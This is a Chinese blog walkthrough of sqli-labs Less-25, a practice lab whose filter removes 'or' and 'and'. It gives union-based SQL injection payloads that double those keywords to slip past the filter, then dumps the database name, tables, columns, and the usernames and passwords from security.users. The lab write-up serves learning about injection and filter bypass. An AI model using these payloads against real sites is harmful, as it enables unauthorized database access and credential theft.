zoukankan      html  css  js  c++  java
  • Less(25)Trick with OR & AND (过滤了or和and)

    1.OR&AND欺骗

      (1)测试一下

        ?id=1' #

        

         ?id=1' --+

        

       看到id周围是单引号,但是第二种没有报错,可以注入

        

         看一下php,发现会把or 和and 转义成空格

    2.--+绕过,双写or和and

      (1)爆库:?id=-1'  union select 1,2,database()--+

        

      (2)爆表:?id=-1' union select 1,2,group_concat(table_name) from infoorrmation_schema.tables where table_schema="security" --+

        

      (3)爆列名:?id=-1' union select 1,2,group_concat(column_name) from infoorrmation_schema.columns where table_name="users" --+

        

      (4)爆值:

        ?id=-1' union select 1,2,group_concat(passwoorrd)from security.users --+

        

         ?id=-1' union select 1,2,group_concat(username)from security.users --+

        

                

  • 相关阅读:
    ....
    排序相关的问题(jq,java)_1123
    Spring aop 记录操作日志
    vue -element ui 自定义验证规则,封装在公共的文件里
    vue
    ES6 新特性
    正则表达式
    面向对象基础--继承(2)
    面向对象基础(1)
    安装vue环境
  • 原文地址:https://www.cnblogs.com/meng-yu37/p/12310862.html
Copyright © 2011-2022 走看看